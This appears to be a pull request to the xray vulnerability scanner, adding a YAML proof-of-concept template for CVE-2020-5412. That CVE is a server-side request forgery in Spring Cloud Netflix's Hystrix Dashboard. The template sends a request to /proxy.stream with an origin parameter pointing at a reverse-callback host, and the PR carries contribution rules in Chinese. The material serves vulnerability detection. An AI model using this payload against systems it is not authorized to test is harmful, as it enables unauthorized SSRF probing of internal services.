### PR TITLE
poc-yaml-springcloud-netflix-cve-2020-5412-ssrf

### DIFF
--- a/pocs/springcloud-netflix-cve-2020-5412-ssrf.yml
+++ b/pocs/springcloud-netflix-cve-2020-5412-ssrf.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-springcloud-netflix-cve-2020-5412-ssrf
 set:
-    reverse: newReverse()
-    reverseUrl: reverse.url
+  reverse: newReverse()
+  reverseUrl: reverse.url
 rules:
   - method: GET
     path: "/proxy.stream?origin={{reverseUrl}}"

--- a/pocs/springcloud-netflix-cve-2020-5412-ssrf.yml
+++ b/pocs/springcloud-netflix-cve-2020-5412-ssrf.yml
@@ -1,0 +1,14 @@
+name: poc-yaml-springcloud-netflix-cve-2020-5412-ssrf
+set:
+    reverse: newReverse()
+    reverseUrl: reverse.url
+rules:
+  - method: GET
+    path: "/proxy.stream?origin={{reverseUrl}}"
+    expression: |
+      reverse.wait(5)
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  Affected Version: "2.2.0 to 2.2.3, 2.1.0 to 2.1.5"
+  links:
+    - https://tanzu.vmware.com/security/cve-2020-5412


### PR DESCRIPTION
**请先认真阅读下列要求，如不符合会被直接关闭 PR**

- 确保当前 POC 与已有的 POC 没有重复，除了仓库 `pocs` 目录中的，还有内置的几个用 Go 写的 POC也不要重复：
  ```
  poc-go-php-cve-2019-11043-rce
  poc-go-seeyon-htmlofficeservlet-rce
  poc-go-tongda-lfi-upload-rce
  poc-go-tongda-arbitrary-auth
  poc-go-ecology-dbconfig-info-leak
  poc-go-tomcat-put
  poc-go-tomcat-cve-2020-1938
  ```
  
- 阅读规范和要求 
  - https://chaitin.github.io/xray/#/guide/contribute
  - https://chaitin.github.io/xray/#/guide/high_quality_poc

- 一个 pull request 只提交一个 poc

- 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交，可以私聊群管理员

 - 不接受没有测试环境的 poc，测试环境可以使用 [vulhub](https://github.com/vulhub/vulhub/) 或 [vulnapps](https://github.com/Medicean/VulApps)，也可以提供 fofa/zoomeye/shodan 等搜索关键字。 请勿直接填写公网上未修复的站点的地址，如果有特殊情况，请私聊群内管理解决。
 
- 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励，请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信，说明你的 poc 地址，方便发送奖励。

**我是分割线，在提交 poc 填写说明的时候，请务必阅读上方要求，然后删除本分割线和上方的内容，只保留下面自定义的部分即可，否则不予通过。**

----------

## 本 poc 是检测什么漏洞的
Spring Cloud Netflix，2.2.4之前的2.2.x版本，2.1.6之前的2.1.x版本以及较旧的不受支持的版本允许应用程序使用Hystrix Dashboard proxy.stream端点向服务器托管可访问的任何服务器发出请求仪表板。恶意用户或攻击者可以将请求发送到其他不应公开公开的服务器。
Spring Cloud Netflix
2.2.0至2.2.3
2.1.0至2.1.5
较旧的不受支持的版本也会受到影响

## 测试环境
https://github.com/mkheck/aou-hystrix-dashboard

## 备注
![image](https://user-images.githubusercontent.com/16274549/103745145-f218c680-5039-11eb-8db5-0e93541c46a4.png)
